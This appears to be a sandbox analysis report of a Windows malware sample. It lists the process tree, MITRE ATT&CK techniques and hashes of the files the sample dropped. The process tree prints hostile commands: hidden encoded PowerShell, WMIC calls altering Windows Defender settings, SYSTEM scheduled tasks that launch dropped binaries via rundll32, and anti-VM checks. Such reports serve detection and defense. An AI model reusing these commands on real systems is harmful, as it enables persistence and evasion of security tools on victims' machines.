- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gGideZWOf"
  2⤵
  PID:1632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gGideZWOf"
  2⤵
  PID:384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LOHPKuWKJcOzSYPZu" /SC once /ST 00:18:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\QlBnrqw.exe\" mM /YcZndidzR 385132 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5212
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:2964
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5672 -s 580
  2⤵
  - Program crash
  PID:5352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:3176
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2808

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5748

C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\QlBnrqw.exe
C:\Windows\Temp\OIWUzfnoSeVAWsLl\bLTYzkLUOZBMYfc\QlBnrqw.exe mM /YcZndidzR 385132 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:372
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "beIeSqxTUIgkrqSZzo"
  2⤵
  PID:2268
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:5484
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:6032
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2740
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5156
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RmqlacUQU\QeBEPr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ayCOowYLgjutNKI" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:2772
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ayCOowYLgjutNKI2" /F /xml "C:\Program Files (x86)\RmqlacUQU\yiKNMkl.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "ayCOowYLgjutNKI"
  2⤵
  PID:5144
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "ayCOowYLgjutNKI"
  2⤵
  PID:4312
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AvuuMZnAgveLTP" /F /xml "C:\Program Files (x86)\XYcGyWaqnbhU2\aOHypIr.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6096
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wHxxZovhMVeXN2" /F /xml "C:\ProgramData\ERCUCymjGgNKOwVB\ErHsaqX.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4620
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YEzBJjbnitNtrmmkX2" /F /xml "C:\Program Files (x86)\GGkIPDNvPhOAuwTEsUR\RGSgcsB.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XgFMMTvgqSOFYnnQAbZ2" /F /xml "C:\Program Files (x86)\qioMUrUoKCErC\yJBQVUm.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5588
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ZNzITvxeQRflwsDJD" /SC once /ST 00:22:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\OIWUzfnoSeVAWsLl\MbFkrRwq\CbclUdo.dll\",#1 /xdidQt 385132" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5512
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "ZNzITvxeQRflwsDJD"
  2⤵
  PID:5608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "LOHPKuWKJcOzSYPZu"
  2⤵
  PID:2120
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 372 -s 2276
  2⤵
  - Program crash
  PID:5336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5672 -ip 5672
1⤵
PID:3012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1680
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5432

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3564

C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xSZzGJO.exe
C:\Windows\Temp\bpNowFaEeWbSfYmu\mevTngXuZkHKOTD\xSZzGJO.exe MC /jPWqdidkw 525403 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5172
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bIOEZkRAagKtMyjtNl"
  2⤵
  PID:3820
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
  2⤵
  PID:4260
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
    3⤵
    PID:4256
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
      4⤵
      PID:5488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5416
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
        6⤵
        
        PID:5784
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\nXmjFVOHU\WTjYNb.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHXYugTugXnbcjp" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Scheduled Task/Job: Scheduled Task
  PID:5748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "JHXYugTugXnbcjp2" /F /xml "C:\Program Files (x86)\nXmjFVOHU\LqlsQwK.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2628
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "JHXYugTugXnbcjp"
  2⤵
  PID:4924
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "JHXYugTugXnbcjp"
  2⤵
  PID:872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LfFBsRWwzAIUSz" /F /xml "C:\Program Files (x86)\ANKVsfPAuVEU2\iQvjvvn.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5776
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "ybYNGucztUodC2" /F /xml "C:\ProgramData\hVWjTjnIaijqmUVB\KMfWPvK.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XPcedSoTrgNFjKDYa2" /F /xml "C:\Program Files (x86)\HfWdCszlsWLFcdllTSR\WHjuCXH.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tFGbXHHzrJEaMkVZkYf2" /F /xml "C:\Program Files (x86)\tuyZfYaPCcjxC\EiTauGN.xml" /RU "SYSTEM"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6028
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "fxxmGIjnSbKlnnNZc"
  2⤵
  PID:3560
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5172 -s 2024
  2⤵
  - Program crash
  PID:5460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3824 -ip 3824
1⤵
PID:3780

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\MbFkrRwq\CbclUdo.dll",#1 /xdidQt 385132
1⤵
PID:4436
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\OIWUzfnoSeVAWsLl\MbFkrRwq\CbclUdo.dll",#1 /xdidQt 385132
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  PID:6116
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZNzITvxeQRflwsDJD"
    3⤵
    PID:2320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1060 -ip 1060
1⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 372 -ip 372
1⤵
PID:3448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4088 -ip 4088
1⤵
PID:5680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5172 -ip 5172
1⤵
PID:1228

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4132

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5168

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3444

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5952

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5916

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5476

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6128

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3048

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1044

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3588

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3108

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5676

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3468

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1220

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5260

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4340

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3344

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:2840

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:5824

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:2044

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
PID:1736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
6a84ce819f11672e9974ca6638313e76

SHA1
525f9cfbb6bcd16cf8bdc579e8e75d330e7d4f8b

SHA256
8d580d90ad7d363f9bbc26c3c9ce985f0d3a645f4d5ea48c4d8aedb6116a8afb

SHA512
27c14f515a8a778335b9d96a0c03652519cfa69e8fa150356deee7070e8d7ad9f4f20c9813451b2f0bf55f8dc952c3d1782be5907595341cd1d58b1d25744fb7

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
ba2ffb4f3b97750205453a0d29b252a9

SHA1
ad2384b03ccb4e8572c824240a0f2501bb56ecdc

SHA256
1d9d85b3202b509d768001767e0ea79c71e8f28e8abed20626a7987c35e60ef8

SHA512
cb97dbdb1dfdc3150ff1a32566faf354b7846f9ecbba2f355a94474b9f1e9c91c40fc66c3959b927f84c02942b7bbccae4b40f66ee9283040a05f4fcb924bf68

Download Submit
C:\ProgramData\BKJJEBKKEH.exe

Filesize
431KB

MD5
51c75077bca69383b83b1c94c2406e05

SHA1
efc8d7ef37661dadc02171817ff344c84790683f

SHA256
f3f2ee666e572cea6eb5bcfd31fbfbc3b0edc9f99db528bb0a640751fb223033

SHA512
607455d7fc1bb272c03f24205fdbb401ef3b7b09d192b2cb62e9ec271fd44bc5bc83ae8b620446ded5f9998aee3a47d9966ee5b84bb9f5ac7b11648f119b664f

Download Submit
C:\ProgramData\CBAKJEHDBG.exe

Filesize
518KB

MD5
64ae8807b8359c84c00444c2cbab6236

SHA1
db15781e8050dd032b0bd67315283089aef9dd3d

SHA256
1850a11acaede15b70cf7fc93830cd13ed4855f5e6226ef8110427fab9651ddf

SHA512
6e598e9d74d1df6097e0594f0b2f6d06ee07eda98ba91eb9f12500c50bf6d5edc2b4d35165b67b31b627ca10504aee8d7cb1755d7d8b227229c93ee444e2787f

Download Submit
C:\ProgramData\CBFBKFIDHIDG\DGHJEH

Filesize
5.0MB

MD5
73eed831c3cb6dd51d7c621f1859e9f5

SHA1
afc71502c8c7aca7b461bb0314038b47b1829b40

SHA256
71e05b6d551384321330b42cfcc9edb84ade695293328e24e006d977b25d8539

SHA512
5879169827f9ea14d0f8f73524b7ecbeb018b31995ac689efca9bd04871f37bfb98340638d3fe7b0ffe59fbe8645429b3cef6d593f6d1a8793503f661b0767a3

Download Submit
C:\ProgramData\CBFBKFIDHIDG\DGHJEH

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\ProgramData\CBFBKFIDHIDG\FCAAEB

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\CBFBKFIDHIDG\HDHCFI

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\ProgramData\CBFBKFIDHIDG\HDHCFI

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\ProgramData\CBFBKFIDHIDG\HDHCFI

Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\ProgramData\GDGHIDBKJEGI\BAKEBA

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\ProgramData\GDGHIDBKJEGI\CBGHCA

Filesize
8KB

MD5
c511da322054c34349cafe9cc366008e

SHA1
c3c48352075cd9b4d5c0084d02cedaf107e797d8

SHA256
84e253654db051bf924213b61a0535b97c5e5885dfb8f6fe74950fb1561c9937

SHA512
7ec8e64ffa28fe95437f509c047181c2413a9a7eee4dbf608752e599563aefeba91d7d0f10bf19671054c6f3394de590e0fedf2b90a88271791eddb7303339a9

Download Submit
C:\ProgramData\GDGHIDBKJEGI\CGIJJK

Filesize
114KB

MD5
d681f32f41435252b44d84a0a92ac5af

SHA1
72656a29ecd5bb6bc779503781de9e8da7a91c18

SHA256
208b27a9ee035d4cdd35e317c3947dd3ae35e9d2b3c1010666d9a78187767cb2

SHA512
00932ddb9a1818e2f1773998e80c9582e41638f080ed047c441f899850c613aa38b73301b7dbd9225fd6536b03c6b65ea61455b32755ac45d38f22f300e310eb

Download Submit
C:\ProgramData\GDGHIDBKJEGI\DGHJEH

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\ProgramData\GDGHIDBKJEGI\FCFBFB

Filesize
160KB

MD5
f310cf1ff562ae14449e0167a3e1fe46

SHA1
85c58afa9049467031c6c2b17f5c12ca73bb2788

SHA256
e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

SHA512
1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

Download Submit
C:\ProgramData\freebl3.dll

Filesize
669KB

MD5
550686c0ee48c386dfcb40199bd076ac

SHA1
ee5134da4d3efcb466081fb6197be5e12a5b22ab

SHA256
edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa

SHA512
0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
439KB

MD5
5ff1fca37c466d6723ec67be93b51442

SHA1
34cc4e158092083b13d67d6d2bc9e57b798a303b

SHA256
5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

SHA512
